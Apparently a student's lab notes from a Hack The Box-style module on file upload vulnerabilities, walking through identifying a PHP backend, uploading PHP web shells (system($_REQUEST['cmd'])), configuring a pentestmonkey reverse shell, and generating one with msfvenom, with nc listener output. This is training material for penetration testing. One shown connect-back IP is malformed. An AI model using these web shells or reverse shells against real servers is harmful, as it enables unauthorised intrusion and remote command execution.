Basic Exploitation
Absent Validation
The web application applies no validation filters at all to uploaded files, so any file type, including server-side scripts, is accepted by default.
Arbitrary File Upload
We can drag and drop any file we want, including .php files, and its name will appear on the upload form.

Identifying Web Framework
One easy method to determine what language runs the web application is to visit the /index.ext page, where we would swap out ext with various common web extensions, like php, asp, aspx, among others, to see whether any of them exist.
For example, when we visit our exercise below, we see its URL as http://SERVER_IP:PORT/, because the index filename is usually omitted by default. But if we try visiting http://SERVER_IP:PORT/index.php, we get the same page, which means that this is indeed a PHP web application.
We do not need to do this manually, of course, as we can use a tool like Burp Intruder for fuzzing the file extension using a Web Extensions wordlist, as we will see in upcoming sections.
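The extension check described above, automated as a small probe. This is an added example written for these notes, not code from the module or from Burp; it uses only the standard library. The URL http://SERVER_IP:PORT and the extension list are placeholders/assumptions. Besides the status code it applies the "same page" test from the text (the body of /index.ext must match the body of /), and treats several matches as inconclusive, since a catch-all rewrite rule returns the same page for every name.

```python
"""Probe /index.<ext> to guess the server-side language (added example, not from the module)."""
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

# Extensions to try (assumed list); swap in a SecLists web-extensions wordlist for a fuller run.
COMMON_EXTENSIONS = ["php", "php5", "phtml", "asp", "aspx", "jsp", "jspx", "cfm", "pl", "py"]

Fetch = Callable[[str], Tuple[int, bytes]]


def http_get(url: str, timeout: float = 5.0) -> Tuple[int, bytes]:
    """GET url and return (status, body); HTTP errors keep their code, network errors become (0, b'')."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()
    except (urllib.error.URLError, OSError):
        return 0, b""


def probe_index_extensions(base_url: str, extensions: List[str] = COMMON_EXTENSIONS,
                           fetch: Fetch = http_get) -> Dict[str, Tuple[int, bool]]:
    """Request base_url/index.<ext> for every extension.

    Returns {ext: (status, same_as_root)} where same_as_root is True when the
    response is a 200 whose body is byte-identical to the site root, i.e. the
    "same page" check from the text. `fetch` is injectable for offline tests."""
    base = base_url.rstrip("/")
    _, root_body = fetch(base + "/")
    results: Dict[str, Tuple[int, bool]] = {}
    for ext in extensions:
        status, body = fetch(f"{base}/index.{ext}")
        results[ext] = (status, status == 200 and body == root_body)
    return results


def matching_extensions(results: Dict[str, Tuple[int, bool]]) -> List[str]:
    """Extensions that served the root page. Exactly one hit identifies the
    language; several hits usually mean a catch-all rewrite rule answered for
    everything, so treat that as inconclusive rather than as a multi-language app."""
    return [ext for ext, (_, same) in results.items() if same]


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://SERVER_IP:PORT"  # placeholder target
    res = probe_index_extensions(target)
    for ext, (status, same) in res.items():
        print(f"index.{ext}: {status}{'  <- same as /' if same else ''}")
    print("matching:", matching_extensions(res))
```

Run it as `python3 probe.py http://SERVER_IP:PORT`. A 403 on index.ext also proves the file exists, so look at the raw status table, not only the "matching" line, before deciding.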

Vulnerability Identification
As an initial test to identify whether we can upload arbitrary PHP files, let's create a basic Hello World script to test whether we can execute PHP code with our uploaded file.
To do so, we will write <?php echo "Hello HTB";?> to test.php and try uploading it to the web application. If opening the uploaded file returns the text Hello HTB instead of the PHP source, the server executes our code.

PoCs - Questions
Try to upload a PHP script that executes the (hostname) command on the back-end server, and submit the first word of it as the answer.
## Create a PHP file, e.g. hsh.php, with the following content and upload it:
<?php system('hostname'); ?>

Upload Exploitation
Web Shells
One good option for PHP is phpbash, which provides a terminal-like, semi-interactive web shell. Furthermore, SecLists provides a plethora of web shells for different frameworks and languages.
Let's try to upload phpbash.php from phpbash to our web application, and then navigate to its link by clicking on the Download button:

Writing Custom Web Shell
For example, with PHP web applications, we can use the system() function, which executes a system command and prints its output, and pass it the cmd parameter via $_REQUEST['cmd'] (read from the query string, POST body or cookies) or $_GET['cmd'] (query string only), as follows:
<?php system($_REQUEST['cmd']); ?>
## or
<?php system($_GET['cmd']); ?>
If system() is blocked by PHP's disable_functions, the same one-liner works with shell_exec(), passthru() or exec() instead.
Reverse Shell
Let's download a PHP reverse shell script, like the pentestmonkey php-reverse-shell, and open it in a text editor to input our IP and listening PORT, which the script will connect back to. For the pentestmonkey script, we can modify lines 49 and 50 and input our machine's IP/PORT:
## In the file, change this
$ip = 'OUR_IP'; // CHANGE THIS
$port = OUR_PORT; // CHANGE THIS
## On our machine
eldeim@htb[/htb]$ nc -lvnp OUR_PORT
listening on [any] OUR_PORT ...
connect to [OUR_IP] from (UNKNOWN) [188.166.173.208] 35232
> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Generating Custom Reverse Shell Scripts
Tools like msfvenom can generate a reverse shell script in many languages and may even attempt to bypass certain restrictions in place. We can do so as follows for PHP:
eldeim@htb[/htb]$ msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
...SNIP...
Payload size: 3033 bytes
###########################################
eldeim@htb[/htb]$ nc -lvnp OUR_PORT
listening on [any] OUR_PORT ...
connect to [OUR_IP] from (UNKNOWN) [181.151.182.286] 56232
# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

PoCs - Questions
Try to exploit the upload feature to upload a web shell and get the content of /flag.txt
We can upload a basic $_GET/$_REQUEST web shell or the phpbash shell, then request it with cmd=cat /flag.txt:
<?php system($_GET['cmd']); ?> ## ws.php
## or
phpbash.php ## downloaded from the phpbash GitHub repository